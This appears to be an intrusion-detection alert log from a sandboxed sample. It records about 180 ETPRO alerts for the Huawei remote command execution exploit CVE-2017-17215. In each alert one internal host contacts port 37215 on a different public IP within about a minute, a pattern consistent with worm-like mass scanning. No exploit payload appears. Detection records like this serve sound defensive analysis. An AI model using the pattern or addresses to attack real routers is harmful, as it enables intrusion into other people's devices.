                                                        06/13/24-21:32:25.995301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5278237215192.168.2.14156.243.52.165
                                                        06/13/24-21:32:13.567013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370637215192.168.2.14156.255.87.84
                                                        06/13/24-21:33:02.913124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4636037215192.168.2.14156.43.53.115
                                                        06/13/24-21:32:05.369749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950037215192.168.2.1441.176.63.219
                                                        06/13/24-21:32:17.675869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591837215192.168.2.14156.40.179.38
                                                        06/13/24-21:32:07.401125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5653837215192.168.2.14156.111.180.234
                                                        06/13/24-21:32:11.506665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5853637215192.168.2.14156.191.106.213
                                                        06/13/24-21:32:30.078314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3773037215192.168.2.1441.52.102.118
                                                        06/13/24-21:32:23.833653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4488037215192.168.2.14197.93.99.37
                                                        06/13/24-21:32:46.503202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3743237215192.168.2.1441.129.170.139
                                                        06/13/24-21:33:11.159097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485837215192.168.2.14197.241.156.49
                                                        06/13/24-21:33:02.909618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4929837215192.168.2.1441.161.209.38
                                                        06/13/24-21:32:07.401671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504637215192.168.2.14156.159.236.204
                                                        06/13/24-21:32:01.224949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856237215192.168.2.14197.78.135.255
                                                        06/13/24-21:32:19.729057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967237215192.168.2.14156.186.97.129
                                                        06/13/24-21:32:23.834592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5551037215192.168.2.1441.255.31.150
                                                        06/13/24-21:32:58.823899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376037215192.168.2.14197.90.38.8
                                                        06/13/24-21:32:07.400927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061237215192.168.2.1441.246.180.234
                                                        06/13/24-21:32:46.510209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3305637215192.168.2.14156.119.89.157
                                                        06/13/24-21:32:17.696537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125637215192.168.2.14156.170.112.58
                                                        06/13/24-21:32:23.938285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739437215192.168.2.14156.3.1.13
                                                        06/13/24-21:32:46.508292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453237215192.168.2.14156.209.27.242
                                                        06/13/24-21:33:07.040132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3949637215192.168.2.1441.58.222.177
                                                        06/13/24-21:32:09.455012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5307837215192.168.2.1441.173.8.38
                                                        06/13/24-21:32:03.276232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4882237215192.168.2.14197.174.171.58
                                                        06/13/24-21:32:32.166197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447637215192.168.2.14156.179.211.23
                                                        06/13/24-21:33:05.011222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482437215192.168.2.14197.18.7.230
                                                        06/13/24-21:33:09.089484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5635637215192.168.2.14156.218.49.73
                                                        06/13/24-21:32:34.215297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5630437215192.168.2.14156.251.199.240
                                                        06/13/24-21:33:00.885479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3644437215192.168.2.14197.170.181.238
                                                        06/13/24-21:32:34.195380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381837215192.168.2.14197.59.166.173
                                                        06/13/24-21:32:09.439590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5019837215192.168.2.1441.233.76.20
                                                        06/13/24-21:32:30.096315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6035837215192.168.2.1441.215.176.90
                                                        06/13/24-21:32:32.153118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4376037215192.168.2.1441.129.232.239
                                                        06/13/24-21:32:42.408784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3431437215192.168.2.14197.73.238.158
                                                        06/13/24-21:32:38.300734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4588637215192.168.2.1441.206.23.219
                                                        06/13/24-21:32:34.216551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5221437215192.168.2.1441.189.113.67
                                                        06/13/24-21:33:04.993543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4367837215192.168.2.14197.54.110.192
                                                        06/13/24-21:32:50.615193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3418037215192.168.2.1441.113.207.85
                                                        06/13/24-21:33:07.060356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5976837215192.168.2.14197.198.161.186
                                                        06/13/24-21:32:44.475108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939637215192.168.2.1441.56.16.116
                                                        06/13/24-21:32:05.347545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6029837215192.168.2.14156.241.249.90
                                                        06/13/24-21:33:09.102106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027037215192.168.2.1441.3.215.207
                                                        06/13/24-21:32:28.027174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968237215192.168.2.14156.20.156.157
                                                        06/13/24-21:32:38.304274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306837215192.168.2.14156.105.100.210
                                                        06/13/24-21:32:38.319987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284837215192.168.2.1441.29.41.250
                                                        06/13/24-21:32:05.370310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332437215192.168.2.14156.59.137.112
                                                        06/13/24-21:32:54.726394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4371437215192.168.2.14197.191.79.113
                                                        06/13/24-21:32:05.344134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3972837215192.168.2.14197.166.134.148
                                                        06/13/24-21:32:07.400683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947837215192.168.2.1441.63.41.43
                                                        06/13/24-21:32:50.614580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4859437215192.168.2.14197.231.178.217
                                                        06/13/24-21:32:11.485533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944837215192.168.2.1441.1.6.75
                                                        06/13/24-21:32:44.456472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354437215192.168.2.1441.161.88.127
                                                        06/13/24-21:32:44.477207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4475637215192.168.2.14156.219.79.55
                                                        06/13/24-21:31:59.195923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4178037215192.168.2.14197.155.238.189
                                                        06/13/24-21:32:05.349796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860037215192.168.2.14197.157.195.201
                                                        06/13/24-21:32:32.164285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692237215192.168.2.14197.192.188.160
                                                        06/13/24-21:32:19.731810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3857637215192.168.2.14156.114.125.216
                                                        06/13/24-21:32:32.168261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4721437215192.168.2.1441.46.235.168
                                                        06/13/24-21:32:07.419958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745637215192.168.2.14156.243.173.68
                                                        06/13/24-21:32:38.303913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203837215192.168.2.14156.172.118.91
                                                        06/13/24-21:32:17.676000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5250837215192.168.2.14197.162.107.62
                                                        06/13/24-21:32:46.524005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987237215192.168.2.14156.74.206.197
                                                        06/13/24-21:32:13.543800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4888837215192.168.2.14197.69.234.186
                                                        06/13/24-21:32:30.127391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4689437215192.168.2.14156.29.123.103
                                                        06/13/24-21:32:52.659421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215637215192.168.2.1441.3.188.12
                                                        06/13/24-21:33:07.054907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5410437215192.168.2.1441.232.104.37
                                                        06/13/24-21:31:57.132358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5716237215192.168.2.14197.37.22.33
                                                        06/13/24-21:31:59.174323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349237215192.168.2.14197.48.44.114
                                                        06/13/24-21:33:11.160237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3454837215192.168.2.14156.190.207.57
                                                        06/13/24-21:32:19.753662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6016437215192.168.2.1441.105.187.56
                                                        06/13/24-21:32:48.567942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3352637215192.168.2.14156.113.28.149
                                                        06/13/24-21:33:13.210456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4623037215192.168.2.1441.182.83.177
                                                        06/13/24-21:32:34.216642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821237215192.168.2.1441.87.113.29
                                                        06/13/24-21:33:00.870887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5515637215192.168.2.1441.76.163.11
                                                        06/13/24-21:32:07.401003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3759637215192.168.2.14197.37.189.130
                                                        06/13/24-21:32:32.153934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4518837215192.168.2.1441.45.29.43
                                                        06/13/24-21:32:36.243713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4162037215192.168.2.14156.119.10.5
                                                        06/13/24-21:32:07.402399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5630637215192.168.2.1441.67.18.42
                                                        06/13/24-21:32:15.608885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5445037215192.168.2.14197.208.206.99
                                                        06/13/24-21:32:40.372966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4018637215192.168.2.1441.234.27.130
                                                        06/13/24-21:32:25.994769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4274237215192.168.2.1441.158.19.110
                                                        06/13/24-21:32:03.299012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5636237215192.168.2.1441.220.176.254
                                                        06/13/24-21:32:36.262514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080637215192.168.2.14156.255.93.84
                                                        06/13/24-21:32:19.753799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390437215192.168.2.14197.103.56.20
                                                        06/13/24-21:31:57.132502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4035637215192.168.2.14156.27.162.36
                                                        06/13/24-21:32:30.095292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3599637215192.168.2.14197.146.245.205
                                                        06/13/24-21:32:58.823265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4165037215192.168.2.14197.160.253.44
                                                        06/13/24-21:33:00.884969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826037215192.168.2.14197.82.146.150
                                                        06/13/24-21:32:46.503695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601237215192.168.2.14197.30.21.153
                                                        06/13/24-21:33:11.174531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4083637215192.168.2.14197.135.217.165
                                                        06/13/24-21:32:03.301037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314637215192.168.2.14197.38.131.214
                                                        06/13/24-21:32:15.632605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5036237215192.168.2.14156.211.214.10
                                                        06/13/24-21:33:15.253992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4757437215192.168.2.14156.239.20.160
                                                        06/13/24-21:32:48.551314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316037215192.168.2.1441.203.68.145
                                                        06/13/24-21:32:17.678465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569637215192.168.2.14156.169.172.212
                                                        06/13/24-21:33:13.212998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5957637215192.168.2.1441.157.118.134
                                                        06/13/24-21:32:52.678212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087237215192.168.2.14156.162.80.150
                                                        06/13/24-21:32:07.403510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4120237215192.168.2.14156.246.145.222
                                                        06/13/24-21:32:17.674645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3830637215192.168.2.14197.111.143.248
                                                        06/13/24-21:32:42.407020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3405637215192.168.2.14156.95.217.69
                                                        06/13/24-21:32:38.301649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4198837215192.168.2.14156.183.82.217
                                                        06/13/24-21:32:11.487968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030437215192.168.2.14197.234.8.131
                                                        06/13/24-21:32:23.938746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3914837215192.168.2.1441.57.199.132
                                                        06/13/24-21:32:58.844199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376237215192.168.2.1441.186.209.155
                                                        06/13/24-21:32:38.297731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5551837215192.168.2.14156.137.223.210
                                                        06/13/24-21:32:44.452689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5042037215192.168.2.14156.110.149.183
                                                        06/13/24-21:32:58.822178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4738437215192.168.2.14197.226.99.181
                                                        06/13/24-21:32:13.543324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199037215192.168.2.14197.98.100.249
                                                        06/13/24-21:33:09.112128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448637215192.168.2.14197.65.235.142
                                                        06/13/24-21:32:42.409809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3758837215192.168.2.1441.86.182.47
                                                        06/13/24-21:33:11.156147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553037215192.168.2.14197.190.225.126
                                                        06/13/24-21:32:42.417688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140237215192.168.2.14197.152.157.50
                                                        06/13/24-21:32:36.263719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287037215192.168.2.1441.101.56.49
                                                        06/13/24-21:32:09.457191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3876637215192.168.2.14197.38.183.21
                                                        06/13/24-21:32:07.415360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3427437215192.168.2.1441.9.172.41
                                                        06/13/24-21:32:17.697251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6023837215192.168.2.14197.18.90.168
                                                        06/13/24-21:32:01.238447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390437215192.168.2.14197.44.84.112
                                                        06/13/24-21:32:36.266820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4274237215192.168.2.1441.246.150.128
                                                        06/13/24-21:32:32.168435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013837215192.168.2.1441.161.57.174
                                                        06/13/24-21:33:05.010880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5614637215192.168.2.1441.22.41.86
                                                        06/13/24-21:32:05.343744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734237215192.168.2.14156.154.140.41
                                                        06/13/24-21:32:52.659582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283837215192.168.2.14156.200.190.4
                                                        06/13/24-21:32:03.277722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4676837215192.168.2.14197.137.20.236
                                                        06/13/24-21:32:13.543980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958637215192.168.2.14197.153.187.83
                                                        06/13/24-21:32:30.074013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4427637215192.168.2.14156.96.93.139
                                                        06/13/24-21:32:42.419079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4363637215192.168.2.1441.40.143.143
                                                        06/13/24-21:32:30.127246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534437215192.168.2.14197.88.156.102
                                                        06/13/24-21:32:09.458627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3686637215192.168.2.1441.20.25.150
                                                        06/13/24-21:32:15.610959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5539437215192.168.2.14197.216.132.168
                                                        06/13/24-21:32:38.304174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3407237215192.168.2.1441.126.205.211
                                                        06/13/24-21:33:11.181744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3707837215192.168.2.1441.71.146.18
                                                        06/13/24-21:32:15.607135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4257037215192.168.2.14156.33.96.8
                                                        06/13/24-21:32:21.805701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471437215192.168.2.14197.13.30.85
                                                        06/13/24-21:32:40.354814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358237215192.168.2.14156.9.67.66
                                                        06/13/24-21:33:07.055420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4041237215192.168.2.14197.187.157.100
                                                        06/13/24-21:32:54.709485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3327237215192.168.2.14197.29.91.16
                                                        06/13/24-21:32:13.568419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3372237215192.168.2.1441.118.160.150
                                                        06/13/24-21:32:15.611579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4441837215192.168.2.14197.78.10.45
                                                        06/13/24-21:32:42.402981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3764437215192.168.2.14156.123.219.108
                                                        06/13/24-21:33:13.213232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859837215192.168.2.14197.124.66.214
                                                        06/13/24-21:32:44.453554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566837215192.168.2.14197.249.60.151
                                                        06/13/24-21:32:52.660167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5674837215192.168.2.1441.95.27.108
                                                        06/13/24-21:32:25.975366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4254037215192.168.2.1441.120.204.169
                                                        06/13/24-21:32:38.318060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4231437215192.168.2.14197.154.132.42
                                                        06/13/24-21:32:15.638615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5549437215192.168.2.14156.54.67.185
                                                        06/13/24-21:32:23.832249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5592237215192.168.2.1441.183.121.164
                                                        06/13/24-21:32:48.569420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6007637215192.168.2.14197.92.35.128
                                                        06/13/24-21:31:59.194516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3728437215192.168.2.14156.78.43.67
                                                        06/13/24-21:32:32.165367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3959837215192.168.2.1441.54.115.143
                                                        06/13/24-21:32:36.265969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5464037215192.168.2.14156.48.52.5
                                                        06/13/24-21:32:07.419762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4570637215192.168.2.1441.167.199.232
                                                        06/13/24-21:32:23.832417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6010037215192.168.2.14156.51.245.142
                                                        06/13/24-21:32:09.458228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158637215192.168.2.14197.162.30.78
                                                        06/13/24-21:32:05.350508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074237215192.168.2.14156.144.75.148
                                                        06/13/24-21:31:57.153610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5702837215192.168.2.14156.182.28.169
                                                        06/13/24-21:32:09.453993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810237215192.168.2.14156.1.30.19
                                                        06/13/24-21:32:40.373473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5252437215192.168.2.14156.247.55.251
                                                        06/13/24-21:32:50.610981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348237215192.168.2.14156.188.207.68
                                                        06/13/24-21:32:30.101266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5815637215192.168.2.14156.188.175.94
                                                        06/13/24-21:32:09.440350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4676237215192.168.2.14197.225.202.223
                                                        06/13/24-21:33:13.214209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3325637215192.168.2.1441.104.157.124
                                                        06/13/24-21:31:57.093048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768837215192.168.2.14156.251.245.149
                                                        06/13/24-21:33:02.914267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5507837215192.168.2.14197.50.73.137
                                                        06/13/24-21:32:28.026517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3358837215192.168.2.14197.66.160.152
                                                        06/13/24-21:32:30.128352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215437215192.168.2.14156.87.207.164
                                                        06/13/24-21:31:59.195531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121437215192.168.2.14156.87.33.240
                                                        06/13/24-21:33:15.254153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5981037215192.168.2.1441.149.31.231
                                                        06/13/24-21:33:17.307525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602837215192.168.2.14197.113.171.215
                                                        06/13/24-21:32:32.149481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4937237215192.168.2.1441.142.130.221
                                                        06/13/24-21:32:01.239824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3524437215192.168.2.14156.112.6.10
                                                        06/13/24-21:33:13.228886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3451637215192.168.2.14197.124.197.111
                                                        06/13/24-21:32:25.995259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5655437215192.168.2.14156.66.9.131
                                                        06/13/24-21:32:05.369682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4295637215192.168.2.1441.223.5.92
                                                        06/13/24-21:32:11.506208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959437215192.168.2.1441.85.23.229
                                                        06/13/24-21:33:15.257045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016037215192.168.2.14197.238.212.32
                                                        06/13/24-21:32:09.459001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110037215192.168.2.1441.156.151.112
                                                        06/13/24-21:32:25.972211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5933237215192.168.2.1441.114.138.50
                                                        06/13/24-21:32:30.098673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5190637215192.168.2.14156.124.135.87
                                                        06/13/24-21:32:34.191377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845637215192.168.2.14197.217.119.105
                                                        06/13/24-21:33:13.214238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396437215192.168.2.1441.118.227.120
                                                        06/13/24-21:32:01.248571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857437215192.168.2.14156.36.253.113
                                                        06/13/24-21:32:11.488635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599637215192.168.2.14197.75.201.51
                                                        06/13/24-21:32:13.569268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439437215192.168.2.14197.80.141.138
                                                        06/13/24-21:32:54.708220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4858637215192.168.2.1441.241.223.168
                                                        06/13/24-21:32:52.654420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3687037215192.168.2.14197.154.95.207
